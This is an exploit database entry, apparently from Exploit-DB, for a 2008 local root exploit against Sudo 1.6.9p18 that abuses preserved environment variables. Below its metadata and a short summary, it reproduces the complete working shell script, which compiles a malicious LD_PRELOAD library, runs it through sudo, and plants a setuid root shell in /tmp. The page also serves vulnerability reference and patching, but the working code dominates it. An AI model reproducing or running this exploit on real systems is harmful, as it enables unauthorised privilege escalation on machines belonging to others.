header-logo
Suggest Exploit
vendor:
Sudo
by:
Kingcope
7.2
CVSS
HIGH
Local Privilege Escalation
264
CWE
Product Name: Sudo
Affected Version From: 1.6.9p18
Affected Version To: 1.6.9p18
Patch Exists: YES
Related CWE: N/A
CPE: a:sudo:sudo
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: FreeBSD-7.0, RedHat Linux
2008

Sudo <= 1.6.9p18 local r00t exploit

This exploit allows a user to gain root privileges on a system running Sudo version 1.6.9p18 or earlier. The exploit requires a special configuration in the sudoers file, which allows environment variables to be preserved. The user must also know the password of the current user. The exploit is written in C and requires two files to be compiled and executed. The first file is a shared library which is loaded by sudo, and the second is a program which is executed by sudo. The shared library contains code which sets the user and group ID to 0, and then executes a shell script which creates a root shell.

Mitigation:

Upgrade to a version of Sudo which is not vulnerable to this exploit.
Source

Exploit-DB raw data:

#!/bin/sh
#* Sudo <= 1.6.9p18 local r00t exploit
#* by Kingcope/2008/www.com-winner.com
#
# Most lame exploit EVER!
#
# Needs a special configuration in the sudoers file:
# --->>>>> "Defaults setenv" so environ vars are preserved :) <<<<<---
#
# May also need the current users password to be typed in
# So this exploit is UBERLAME!
# First Argument to this shell file: A program your current
# user is allowed to execute via sudo. sudo has to be in 
# the path!!
# successfully tested on FreeBSD-7.0 and RedHat Linux
# I don't even know why I realease such stuffz
# I'M GONNA GRAB A COFFE NOW;HAVE PHUN !!!

echo "Sudo <= 1.6.9p18 local r00t exploit"
echo "by Kingcope/2008/www.com-winner.com"

if [$1 == ""]; then
echo "Please give me a program to run via sudo."
echo "Allowed programs:"
sudo -l
exit
fi

cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init()
{
 if (!geteuid()) {
 unsetenv("LD_PRELOAD");
 setgid(0);
 setuid(0);
 execl("/bin/sh","sh","-c","chown 0:0 /tmp/xxxx; /bin/chmod +xs /tmp/xxxx",NULL);
 }
}

_EOF

cat > xxxx.c << _EOF
int main(void) {
       setgid(0); setuid(0);
//       unlink("/tmp/xxxx");
       execl("/bin/sh","sh",0); }
_EOF

gcc -o /tmp/xxxx xxxx.c
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o /tmp/libno_ex.so.1.0 program.o -nostartfiles
sudo LD_PRELOAD=/tmp/libno_ex.so.1.0 $1
if [ -f /tmp/xxxx ]; then
echo "CONGRATULATIONS, IT'S A ROOTSHELL!"
/tmp/xxxx
else
echo "Sorry, exploit failed. No envvars allowed?"
fi

# milw0rm.com [2008-11-15]